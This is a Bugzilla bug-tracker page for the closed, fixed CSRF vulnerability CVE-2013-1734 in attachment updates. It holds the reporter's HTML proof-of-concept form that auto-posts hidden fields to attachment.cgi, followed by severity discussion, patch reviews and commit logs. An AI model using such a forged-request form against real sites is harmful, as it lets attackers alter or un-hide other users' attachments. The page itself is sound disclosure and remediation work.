Closed Bug 913904 (CVE-2013-1734) Opened 10 years ago Closed 10 years ago

[SECURITY] CSRF when updating attachments

Categories

(Bugzilla :: Attachments & Requests, defect)

Product:
Bugzilla
Component:
Attachments & Requests
Version:
2.16
Type:
defect
Priority:
Not set
Severity:
major

Tracking

()

Status:
RESOLVED FIXED
Milestone:
Bugzilla 4.0

People

(Reporter: mateusz.goik, Assigned: LpSolit)

References

Details

(Keywords: sec-high, wsec-csrf)

Attachments

(3 files)

patch for 4.4 and trunk, v1
1.92 KB, patch
dkl
: review+
Details | Diff | Splinter Review
patch for 4.2, v1
1.77 KB, patch
dkl
: review+
Details | Diff | Splinter Review
patch for 4.0, v1
2.48 KB, patch
dkl
: review+
Details | Diff | Splinter Review 
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://landfill.bugzilla.org/bugzilla-tip/attachment.cgi" method="POST">
      <input type="hidden" name="id" value="3100" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="contenttypemethod" value="manual" />
      <input type="hidden" name="delta&#95;ts" value="xxxxxx" />
      <input type="hidden" name="token" value="xxxxx" />
      <input type="hidden" name="description" value="asdasd123" />
      <input type="hidden" name="filename" value="file&#95;21994&#46;txt" />
      <input type="hidden" name="contenttypeentry" value="text&#47;plain" />
      <input type="hidden" name="comment" value="asd" />
      <input type="hidden" name="flag&#95;type&#45;4" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;4" value="" />
      <input type="hidden" name="flag&#95;type&#45;1" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;1" value="" />
      <input type="hidden" name="flag&#95;type&#45;2" value="X" />
      <input type="hidden" name="requestee&#95;type&#45;2" value="" />
      <input type="hidden" name="flag&#95;type&#45;3" value="X" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
This patch is similar to the one for process_bug.cgi.
Assignee: attach-and-request → LpSolit
Status: NEW → ASSIGNED
Attachment #801238 - Flags: review?(dkl)
All versions are affected as bug 476603 was an incomplete fix.
Blocks: 912643
Depends on: 476603
Flags: blocking4.4.1+
Flags: blocking4.2.7+
Flags: blocking4.0.11+
Summary: CSRF in attachment.cgi → [SECURITY] CSRF when updating attachments
Target Milestone: --- → Bugzilla 4.0

        Attachment #801248 -
        Flags: review?(dkl)

    
    

    
  


  
I had to backport the invalid_timestamp error message which didn't exist before 4.2.

        Attachment #801251 -
        Flags: review?(dkl)

    
  
Severity: normal → major
Flags: sec-bounty?
Keywords: sec-critical, 
          
            wsec-csrf

    
    

    
  
Use CVE-2013-1734

Why sec-critical? This isn't compromising bugzilla in general. Beyond vandalism what's the worst you could do here? Luring a privileged user to un-hide an attachment maybe, revealing a security bug? My initial feel was moderate, but given hidden attachments I could live with sec-high.
Alias: CVE-2013-1734
Keywords: sec-criticalsec-high

    
    

    
  
Comment on attachment 801238 [details] [diff] [review]
patch for 4.4 and trunk, v1

Review of attachment 801238 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl

        Attachment #801238 -
        Flags: review?(dkl) → review+

    
    

    
  
Comment on attachment 801248 [details] [diff] [review]
patch for 4.2, v1

Review of attachment 801248 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl

        Attachment #801248 -
        Flags: review?(dkl) → review+

    
    

    
  
Comment on attachment 801251 [details] [diff] [review]
patch for 4.0, v1

Review of attachment 801251 [details] [diff] [review]:
-----------------------------------------------------------------

r=dkl

        Attachment #801251 -
        Flags: review?(dkl) → review+
Flags: approval?
Flags: approval4.4?
Flags: approval4.2?
Flags: approval4.0?

    
  
Flags: approval?
Flags: approval4.4?
Flags: approval4.4+
Flags: approval4.2?
Flags: approval4.2+
Flags: approval4.0?
Flags: approval4.0+
Flags: approval+
Flags: sec-bounty? → sec-bounty+

    
  
Version: unspecified → 2.16

    
    

    
  
Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/trunk/
modified attachment.cgi
Committed revision 8778.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.4/
modified attachment.cgi
Committed revision 8624.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.2/
modified attachment.cgi
Committed revision 8232.

Committing to: bzr+ssh://lpsolit%40gmail.com@bzr.mozilla.org/bugzilla/4.0/
modified attachment.cgi
modified template/en/default/global/code-error.html.tmpl
Committed revision 7760.
Status: ASSIGNED → RESOLVED
Closed: 10 years ago
Resolution: --- → FIXED
Group: bugzilla-security

    
    

    
  
Security advisory sent.

          You need to log in
          before you can comment on or make changes to this bug.